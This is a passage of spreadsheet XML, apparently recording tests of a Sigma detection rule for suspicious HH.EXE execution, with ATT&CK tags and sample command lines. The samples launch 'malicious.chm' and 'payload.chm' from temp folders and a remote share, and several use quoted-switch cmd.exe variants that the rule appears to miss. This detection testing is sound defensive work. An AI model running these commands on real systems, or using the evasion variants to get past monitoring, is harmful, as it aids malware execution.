          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D47" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E47" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F47" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G47" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J47" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K47" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B48" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C48" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D48" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E48" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F48" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G48" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I48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48" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K48" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B49" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C49" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D49" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E49" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F49" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G49" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K49" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B50" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C50" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D50" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E50" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F50" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G50" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J50" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K50" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B51" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C51" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D51" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E51" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F51" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G51" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J51" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K51" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B52" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C52" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D52" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E52" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F52" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G52" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J52" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B53" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C53" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D53" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E53" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F53" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G53" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H53" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I53" s="43" t="n"/>
      <c r="J53" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K53" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B54" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C54" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D54" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E54" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F54" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G54" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H54" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I54" s="43" t="n"/>
      <c r="J54" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K54" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B55" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C55" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D55" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E55" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F55" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G55" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J55" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B56" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C56" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D56" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E56" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F56" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G56" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J56" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K56" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B57" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C57" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D57" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E57" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F57" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G57" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J57" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="44" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B58" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C58" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D58" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E58" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F58" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G58" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I58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58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B59" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C59" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D59" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E59" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F59" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G59" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I59" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K59" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B60" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C60" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D60" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E60" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F60" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G60" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I60" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J60" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K60" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B61" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C61" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D61" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E61" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F61" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G61" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I61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61" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B62" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C62" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D62" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E62" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F62" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G62" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J62" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B63" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C63" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D63" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E63" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F63" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G63" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J63" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B64" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C64" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D64" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E64" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F64" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G64" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J64" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B65" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C65" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D65" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E65" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F65" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G65" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H65" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J65" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B66" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C66" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D66" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E66" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F66" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G66" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H66" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I66" s="43" t="n"/>
      <c r="J66" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B67" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C67" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D67" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E67" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F67" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G67" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H67" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I67" s="43" t="n"/>
      <c r="J67" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B68" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C68" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D68" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E68" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F68" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G68" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H68" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J68" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K68" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B69" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C69" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D69" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E69" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F69" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G69" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K69" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B70" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C70" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D70" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E70" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F70" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G70" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="44" t="inlineStr">
        <is>
          <t>t1059.007</t>
        </is>
      </c>
      <c r="B71" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C71" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D71" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E71" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F71" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G71" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I71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71" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K71" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B72" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C72" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D72" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E72" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F72" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G72" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J72" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B73" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C73" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D73" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E73" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F73" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G73" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J73" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="44" t="inlineStr">
